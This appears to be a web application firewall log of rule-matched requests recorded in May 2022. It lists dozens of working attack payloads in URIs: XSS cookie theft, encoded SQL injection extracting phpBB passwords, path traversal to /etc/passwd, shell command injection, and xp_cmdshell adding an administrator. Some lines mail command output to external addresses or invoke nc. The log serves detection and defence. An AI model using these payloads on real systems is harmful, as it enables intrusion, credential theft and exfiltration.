TimeStamp [18/May/2022:10:51:13 +0200]	Uri [/page.php?page_type=catalog_products&type_id%5B%5D=%3Cscript%3Ealert%28document.domain%29%3B%3C/script%3E&SESSION_ID=%7BSESSION_ID%7D&SESSION_ID=]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[943120]	[949110]
TimeStamp [18/May/2022:10:51:15 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6ei%6f%6e%20sel%65ct%20%6f%72d%28subs%74%72%69ng%28%75%73%65r%5f%70%61%73s%77%6frd%2c1%32]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:16 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20se%6ce%63t%20%6f%72%64%28s%75bst%72%69ng%28%75%73%65r%5f%70%61%73%73wo%72d]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:17 +0200]	Uri [/forum_details.php?user_nick=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [18/May/2022:10:51:18 +0200]	Uri [/examplesWebApp/InteractiveQuery.jsp?person=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:19 +0200]	Uri [/cgi-bin/talkback.cgi?article=../../../../../../../../etc/hosts%00&action=view&matchview=1]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:20 +0200]	Uri [/eManager/Email%20Management/cgi-bin/spamrule.dll]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:20 +0200]	Uri [/cgi-bin/store.cgi?StartID=../etc/passwd%00.html]	PLmin [1]	Score [30]	Nattacks [5]	[920270]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:21 +0200]	Uri [/html/partner.php?mainfile=anything&Default_Theme=%27%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [18/May/2022:10:51:22 +0200]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:23 +0200]	Uri [/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:24 +0200]	Uri [/isqlplus?action=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:26 +0200]	Uri [/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=%3Bls%7Cmail%20attacker%40attacker-host%7C&f6=%5Ea.%2A&action=searchdbdisplay]	PLmin [1]	Score [5]	Nattacks [2]	[932100]	[949110]
TimeStamp [18/May/2022:10:51:27 +0200]	Uri [/quikstore.cfg]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:27 +0200]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27ping%2010.10.10.11%27%3B--]	PLmin [1]	Score [10]	Nattacks [3]	[932100]	[942190]	[949110]
TimeStamp [18/May/2022:10:51:29 +0200]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bnc]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:29 +0200]	Uri [/scripts/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:30 +0200]	Uri [/cgi-bin/shopper.cgi?newpage=../../..//etc/passwd.html]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:31 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6ei%6f%6e%20se%6cec%74%20%6fr%64%28%73%75%62s%74ring%28%75%73e%72_%70%61%73%73w%6fr%64%2c30%2c%31%29%29%20f%72%6fm%20p%68%70bb_%75s%65r%73%20wh%65re%20%75%73%65r%5f%69d%3d2%2f%2A&view=newest]	PLmin [1]	Score [15]	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:33 +0200]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd]	PLmin [1]	Score [10]	Nattacks [3]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:34 +0200]	Uri [/global.asa%2B.htr]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:34 +0200]	Uri [/cgi-bin/loadpage.cgi?user_id=id&file=.%7C./.%7C./.%7C./.%7C./.%7C./etc/resolv.conf%00.html]	PLmin [1]	Score [15]	Nattacks [3]	[920270]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:35 +0200]	Uri [/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=]	PLmin [1]	Score [35]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:35 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6fn%20s%65%6c%65%63t%20%6f%72%64%28s%75%62%73t%72i%6eg%28%75s%65%72_%70as%73%77ord]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:36 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6e%69%6fn%20s%65l%65%63t%20o%72%64%28su%62st%72%69n%67%28%75%73er_%70%61ss%77%6f%72%64%2c1%38%2c%31%29%29%20f%72%6fm%20%70hpb%62%5fu%73e%72%73%20%77h%65re%20u%73e%72_id%3d%32%2f%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:38 +0200]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:39 +0200]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09mr_r%40hotmail%2Ecom]	PLmin [1]	Score [5]	Nattacks [2]	[932100]	[949110]
TimeStamp [18/May/2022:10:51:40 +0200]	Uri [/misc.php?do=page&template=%7B%24%7Bphpinfo%28%29%7D%7D%0D]	PLmin [1]	Score [10]	Nattacks [3]	[932130]	[933160]	[949110]
TimeStamp [18/May/2022:10:51:41 +0200]	Uri [/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html]	PLmin [1]	Score [55]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:42 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20s%65%6c%65ct%20%6frd%28s%75%62s%74ri%6eg%28u%73%65r%5f%70a%73sw%6fr%64%2c6%2c%31%29%29%20%66ro%6d%20%70%68%70%62%62_%75%73e%72%73%20%77%68er%65%20u%73%65%72_%69d=2/%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:43 +0200]	Uri [/cgi-bin/a1stats/a1disp.cgi?%7Cecho%20%3Ea1admin.txt%7C]	PLmin [1]	Score [10]	Nattacks [3]	[932100]	[932110]	[949110]
TimeStamp [18/May/2022:10:51:45 +0200]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls%20%7C]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[932150]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:46 +0200]	Uri [/cgi-bin/htsearch?-c/etc/passwd]	PLmin [1]	Score [10]	Nattacks [3]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:47 +0200]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:47 +0200]	Uri [/nuke71/modules.php?name=Recommend_Us&op=SiteSent&fname=%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [18/May/2022:10:51:49 +0200]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22/bin/ls%22--%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [30]	Nattacks [7]	[920440]	[932160]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [18/May/2022:10:51:50 +0200]	Uri [/scripts/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:51 +0200]	Uri [/cgi-bin/sendtemp.pl?templ=/etc/passwd]	PLmin [1]	Score [10]	Nattacks [3]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:52 +0200]	Uri [/cgi-bin/viewAttachment.cgi?file=../../../../../etc/passwd]	PLmin [1]	Score [35]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:53 +0200]	Uri [/cgi-bin/testcgi.exe?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [18/May/2022:10:51:54 +0200]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27net%20localgroup%20administrators%20algo%20/add%27%3B--]	PLmin [1]	Score [10]	Nattacks [3]	[932100]	[942190]	[949110]
TimeStamp [18/May/2022:10:51:56 +0200]	Uri [/cgi-bin/survey/survey.cgi?survey_name=%27ls%7Cmore]	PLmin [1]	Score [5]	Nattacks [2]	[932150]	[949110]
TimeStamp [18/May/2022:10:51:56 +0200]	Uri [/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%20union%20select/%2A]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:57 +0200]	Uri [/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:58 +0200]	Uri [/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999%2Bunion%2Bselect%2Bshlpswd%2Bas%2Bmestname]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:59 +0200]	Uri [/cgi-bin/smartsearch/smartsearch.cgi?keywords=%7C/bin/cat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
TimeStamp [18/May/2022:10:52:00 +0200]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Eperl%20-e%20%27print%20%22%3CIMG%20SRC=java%5C0script:alert%28%5C%22XSS%5C%22%29%3E%22%3B%27%20%3E%20out%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [5]	[920440]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:52:01 +0200]	Uri [/%2e%2e/%2e%2e%5cversion%00.jsp]	PLmin [1]	Score [25]	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:52:03 +0200]	Uri [/%2e%2e/%2e%2e/%00.jsp]	PLmin [1]	Score [20]	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:52:03 +0200]	Uri [/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534%7E/bin/ls]	PLmin [1]	Score [5]	Nattacks [2]	[932160]	[949110]
TimeStamp [18/May/2022:10:52:04 +0200]	Uri [/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/host.allow%7C&CODE=PHOLD]	PLmin [1]	Score [5]	Nattacks [2]	[932100]	[949110]
TimeStamp [18/May/2022:10:52:04 +0200]	Uri [/wp-includes/theme.php?iz=cat%20/etc/hosts]	PLmin [1]	Score [5]	Nattacks [2]	[930120]	[949110]
